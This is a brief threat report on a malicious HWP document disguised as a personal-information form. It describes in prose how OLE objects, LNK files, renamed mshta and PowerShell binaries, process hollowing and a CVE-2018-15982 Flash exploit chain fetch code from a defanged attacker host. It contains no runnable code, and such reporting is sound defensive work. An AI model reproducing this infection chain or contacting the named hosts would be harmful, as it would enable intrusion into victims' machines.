A malicious Hangul document disguised as a profile or personal-information form used embedded OLE objects and hidden hyperlinks to launch copied Windows binaries from the Temp directory. Clicking form fields executed a local LNK that ran a renamed mshta binary against hxxp://yukkimmo.sportsontheweb[.]net/hw.php, enabling attacker-controlled commands. Additional observed commands used a renamed PowerShell binary to download and execute script content from hxxp://yukkimmo.sportsontheweb[.]net/h.txt. The script downloaded PE data, hollowed System32\cmd.exe, tracked recent HWP link filenames, and replaced the opened document with another HWP that could contain a Flash object exploiting CVE-2018-15982. The report matters because it shows reuse of an older HWP Flash exploit chain with OLE, LNK, mshta, PowerShell, and document-replacement techniques that can support further attacker commands.